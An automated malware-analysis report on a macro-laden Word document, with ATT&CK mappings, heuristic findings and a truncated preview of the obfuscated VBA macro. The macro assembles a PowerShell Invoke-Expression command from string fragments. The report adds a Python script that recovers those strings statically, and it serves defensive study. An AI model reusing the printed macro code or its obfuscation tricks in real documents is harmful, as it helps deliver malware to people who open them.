Verdict: MALICIOUS (Risk Score 182)

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 User Execution: Malicious File
The sample is a malicious Office document containing a VBA macro with an AutoOpen function, so the macro runs as soon as the document is opened with macros enabled. The macro calls the Shell() function, which hands an arbitrary command line to the operating system. The obfuscated source assembles that command from many short string fragments, interleaved with arithmetic on undefined variables that serves only as noise (any runtime error is swallowed by On Error Resume Next). The fragments visible in the extracted source spell a PowerShell command: it obtains Invoke-Expression through the $ShellId[1]+$ShellId[13]+'X' trick ($ShellId is "Microsoft.PowerShell", so the two indices yield "i" and "e", giving "ieX"), clears the output field separator with set 'Ofs' '', and rebuilds its real payload by casting a comma-separated integer array with [String]. The decoded payload is not present in the preview, but this construction is characteristic of a downloader, so the command likely fetches and executes a second-stage payload.
Heuristics 6

- VBA macros detected (medium, 3 related findings) OLE_VBA_MACROS: Document contains VBA macro code.
- Shell() call in VBA (critical) OLE_VBA_SHELL: Shell() call in VBA.
- AutoOpen macro (high) OLE_VBA_AUTOOPEN: AutoOpen macro.
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that its wording assumes no VBA project was recovered, which the extracted macros.bas below contradicts, so for this sample treat it as a weaker duplicate of the AutoOpen finding rather than as independent evidence.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace identifier that Office drawing parts reference; it is not a download location and not an indicator of compromise.
Extracted artifacts 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 30836 bytes | 027f152379906d4a0e9a36f0b5ace9bee534cb7ea2caab74d56adf97b3d0b5ba |

Preview script (first 1,000 lines of the extracted script):
```vb
Attribute VB_Name = "BaDBJhMmoGmQRL"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "afVpIwvPB"
Function pEvzbzqTffl()
On Error Resume Next
inVLE = (BACJt * 17031 + 3586 * CInt(NYOcK - CDbl(75686)) * 98414 * Oct(18341))
rvjhHIVi = "He" + "ll " + " & " + "( $" + "SHe" + "LL"
fDrqWw = (waiRCM * 57702 + 64003 * CInt(ktRGJZ - CDbl(46938)) * 67303 * Oct(45817))
pwiNYmP = "ID" + "[1" + "]+" + "$SH" + "Ell" + "Id"
MWURBZ = (wqIMU * 58980 + 7791 * CInt(MTakPB - CDbl(88924)) * 63884 * Oct(1372))
tarzt = "[13" + "]+'" + "X')" + " (" + " " + Chr(34)
tiCfGi = (SokEc * 17207 + 64030 * CInt(iNnZOP - CDbl(29363)) * 24918 * Oct(62089))
wGfYtMEp = "$( " + "se" + "t "
GwwIjR = (TqIrRT * 68037 + 56478 * CInt(CpTVj - CDbl(19706)) * 86195 * Oct(87845))
TWMUIKsoRH = "'Of" + "s'" + " '" + "') "
nGImLi = (WiAjK * 18380 + 15250 * CInt(PJSZz - CDbl(31562)) * 88095 * Oct(8870))
vWwVrh = Chr(34) + " +" + " [" + "St" + "Ri" + "Ng" + "](" + " (1"
KNZtKN = (FEctLh * 64045 + 60682 * CInt(Wvliwt - CDbl(85894)) * 65182 * Oct(1400))
InYoQE = "6,1" + "01," + " 10" + "1,1"
pEvzbzqTffl = rvjhHIVi + pwiNYmP + tarzt + wGfYtMEp + TWMUIKsoRH + vWwVrh + InYoQE
arTuQ = (BMbzEb * 22840 + 41096 * CInt(bGhOH - CDbl(64837)) * 53578 * Oct(74629))
End Function
Function IjZZjAh()
On Error Resume Next
dUIVwR = (rsDmD * 72923 + 19777 * CInt(zJVFh - CDbl(48385)) * 89840 * Oct(68764))
BOrSwdWdXO = "21" + ",10" + "1 ,"
dVnLT = (YwFYRv * 71743 + 61195 * CInt(KcNiH - CDbl(67598)) * 1691 * Oct(79005))
ckGNYvUtn = " 8" + "5," + " 2" + "0, " + "9," + " 2"
VPzMWE = (iltrc * 57523 + 18519 * CInt(zinwN - CDbl(86767)) * 31187 * Oct(26442))
ZDbuoRPI = "0,9" + "0, " + "81," + "67" + " ,"
HuFMLb = (djrpDw * 23842 + 54962 * CInt(BiKsn - CDbl(69999)) * 63156 * Oct(36943))
VqqvRmhDZl = " 2" + "5, " + "91 " + ", " + "86 " + ",9" + "4,"
jdvCbC = (CTEbz * 19706 + 43444 * CInt(MOwmU - CDbl(40865)) * 5727 * Oct(35779))
tTIKOvOrjuW = " 8" + "1," + "87," + " 64" + ", " + "20 " + ", "
wLKFV = (XNlXbw * 70569 + 52080 * CInt(ojBdH - CDbl(1864)) * 943 * Oct(83951))
iwUpnRslX = "70," + " 8" + "5 ," + "90" + ", "
IjZZjAh = BOrSwdWdXO + ckGNYvUtn + ZDbuoRPI + VqqvRmhDZl + tTIKOvOrjuW + iwUpnRslX
BfZou = (TjKlDP * 85687 + 99730 * CInt(dhNNmu - CDbl(20212)) * 53356 * Oct(76216))
End Function
Function ACHFSimjH()
On Error Resume Next
wkUZKJ = (UwEpQj * 38041 + 74969 * CInt(vozXq - CDbl(91958)) * 69050 * Oct(39648))
Fuwzzm = "80," + " 9" + "1,8"
anmERq = (lzvOz * 13242 + 99129 * CInt(FvuvrM - CDbl(96114)) * 88319 * Oct(51629))
XCwGFwG = "9 " + ", " + "15," + " 1" + "6," + " 12" + "0, "
zWcPAC = (zZkWL * 29740 + 62280 * CInt(lflXY - CDbl(8804)) * 77443 * Oct(78485))
wZJLoI = "82," + "68," + " 1" + "09," + " 6"
SuBod = (ctLVSU * 53647 + 41681 * CInt(tNzjPE - CDbl(88133)) * 61055 * Oct(27246))
qSOjN = "4, " + "68" + ", 2" + "0 ," + " 9 "
FhMVCi = (hEzFB * 23234 + 41956 * CInt(HdztOt - CDbl(18421)) * 18286 * Oct(78346))
qUszaPffEHL = ", " + "20," + "90," + "81" + ", 6" + "7 ,"
KEHZTY = (nGYGQ * 44996 + 18359 * CInt(GnXYrs - CDbl(3303)) * 57949 * Oct(89869))
ccrYjviI = " 2" + "5 " + ",91" + " ," + " 8"
ACHFSimjH = Fuwzzm + XCwGFwG + wZJLoI + qSOjN + qUszaPffEHL + ccrYjviI
bumzo = (XXrrZD * 14951 + 71204 * CInt(qOFzf - CDbl(83575)) * 11045 * Oct(80985))
End Function
Function ampcDITkTp()
On Error Resume Next
HFllz = (JaMSri * 55816 + 75356 * CInt(cjsjS - CDbl(34009)) * 5824 * Oct(60515))
JVKijj = "6 " + ",9" + "4,8" + "1,"
wAdwjP = (WEjsi * 19506 + 73313 * CInt(Eizrpt - CDbl(89866)) * 26158 * Oct(51856))
QRpmrpD = "87 " + ",64" + " ,2"
VwwZYk = (azmwI * 24052 + 88675 * CInt(BVatuk - CDbl(34556)) * 94131 * Oct(35943))
fSMlmbWkW = "0 " + ",10" + "3 ," + "77"
ampcDITkTp = JVKijj + QRpmrpD + fSMlmbWkW
jSLpsE = (CJKSRw * 61558 + 98704 * CInt(HLzdvV - CDbl(9894)) * 88216 * Oct(76410))
End Function
Function npJSRiDZRB()
On Error Resume
```
... (truncated)
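The preview shows the obfuscation pattern but not the command it produces, so the script below, an added example that is neither the analyzer's code nor part of oletools, statically recovers it. It evaluates only assignments made of string literals, Chr() calls and already-resolved local names, which silently discards the arithmetic noise lines, then collects each Function's return string. The VBA excerpt is one function copied verbatim from the preview; the $ShellId resolution assumes the Windows PowerShell value "Microsoft.PowerShell"; all Python names are hypothetical.

```python
"""Recover the strings the obfuscated macro above assembles.

Added example: not the analyzer's code and not part of oletools. It runs on decoded
VBA source such as macros.bas. The excerpt below is one function copied from the
preview; resolving $ShellId assumes the Windows PowerShell value
"Microsoft.PowerShell". Every function name here is hypothetical.
"""
import re

# Constructed excerpt: pEvzbzqTffl() from the preview, verbatim.
VBA_EXCERPT = """
Function pEvzbzqTffl()
On Error Resume Next
inVLE = (BACJt * 17031 + 3586 * CInt(NYOcK - CDbl(75686)) * 98414 * Oct(18341))
rvjhHIVi = "He" + "ll " + " & " + "( $" + "SHe" + "LL"
fDrqWw = (waiRCM * 57702 + 64003 * CInt(ktRGJZ - CDbl(46938)) * 67303 * Oct(45817))
pwiNYmP = "ID" + "[1" + "]+" + "$SH" + "Ell" + "Id"
MWURBZ = (wqIMU * 58980 + 7791 * CInt(MTakPB - CDbl(88924)) * 63884 * Oct(1372))
tarzt = "[13" + "]+'" + "X')" + " (" + " " + Chr(34)
tiCfGi = (SokEc * 17207 + 64030 * CInt(iNnZOP - CDbl(29363)) * 24918 * Oct(62089))
wGfYtMEp = "$( " + "se" + "t "
GwwIjR = (TqIrRT * 68037 + 56478 * CInt(CpTVj - CDbl(19706)) * 86195 * Oct(87845))
TWMUIKsoRH = "'Of" + "s'" + " '" + "') "
nGImLi = (WiAjK * 18380 + 15250 * CInt(PJSZz - CDbl(31562)) * 88095 * Oct(8870))
vWwVrh = Chr(34) + " +" + " [" + "St" + "Ri" + "Ng" + "](" + " (1"
KNZtKN = (FEctLh * 64045 + 60682 * CInt(Wvliwt - CDbl(85894)) * 65182 * Oct(1400))
InYoQE = "6,1" + "01," + " 10" + "1,1"
pEvzbzqTffl = rvjhHIVi + pwiNYmP + tarzt + wGfYtMEp + TWMUIKsoRH + vWwVrh + InYoQE
arTuQ = (BMbzEb * 22840 + 41096 * CInt(bGhOH - CDbl(64837)) * 53578 * Oct(74629))
End Function
"""

# One token of a pure string expression: "literal", Chr(n), a local name, + or &.
TOKEN = re.compile(r'"([^"]*)"|Chr\((\d+)\)|([A-Za-z_]\w*)|([+&])|\s+')
FUNC_RE = re.compile(r"^\s*Function\s+(\w+)\s*\(")
ASSIGN_RE = re.compile(r"^\s*(\w+)\s*=\s*(.+?)\s*$")


def eval_string_expr(expr, env):
    # Returns None for anything but literal/Chr/local concatenation; that is what
    # drops the arithmetic noise lines (undefined names, swallowed at runtime by
    # On Error Resume Next) without ever executing the macro.
    pos, parts = 0, []
    while pos < len(expr):
        m = TOKEN.match(expr, pos)
        if not m:
            return None
        lit, code, name, _op = m.groups()
        if lit is not None:
            parts.append(lit)
        elif code is not None:
            parts.append(chr(int(code)))
        elif name is not None:
            if name not in env:
                return None
            parts.append(env[name])
        pos = m.end()
    return "".join(parts)


def recover_functions(vba):
    # Map each Function to its return value when that value is a pure string build.
    results, env, current = {}, {}, None
    for line in vba.splitlines():
        m = FUNC_RE.match(line)
        if m:
            current, env = m.group(1), {}
            continue
        if line.strip().lower() == "end function":
            current = None
            continue
        m = ASSIGN_RE.match(line)
        if current is None or not m:
            continue
        value = eval_string_expr(m.group(2), env)
        if value is not None:
            env[m.group(1)] = value
            if m.group(1) == current:  # VBA returns by assigning to the function name
                results[current] = value
    return results


SHELL_ID = "Microsoft.PowerShell"  # assumption: $ShellId under Windows PowerShell
SHELLID_RE = re.compile(r"\$ShellId\[(\d+)\]", re.IGNORECASE)
CONCAT_RE = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")


def deobfuscate(cmd):
    # Resolve $ShellId[n] to its quoted character, then fold 'a'+'b' into 'ab' until stable.
    cmd = SHELLID_RE.sub(lambda m: "'" + SHELL_ID[int(m.group(1))] + "'", cmd)
    while True:
        folded = CONCAT_RE.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", cmd)
        if folded == cmd:
            return cmd
        cmd = folded


if __name__ == "__main__":
    for fn, text in recover_functions(VBA_EXCERPT).items():
        print(fn, "->", deobfuscate(text))
```

Run against the full macros.bas, the script yields one string per function; the truncated caller that concatenates them (and the Shell() call that launches the result) is not in the preview, so the order has to be taken from that code rather than guessed. For the excerpted function the recovered text is the tail of a PowerShell invocation, `& ( 'ieX') ( "$( set 'Ofs' '') " + [StRiNg]( (16,101, 101,1...`, where set is the Set-Variable alias clearing $OFS so that the integer array, once converted to characters, joins with no separator before being passed to Invoke-Expression. The conversion and any key applied to those integers lie in the truncated part, so the payload itself cannot be decoded from this preview.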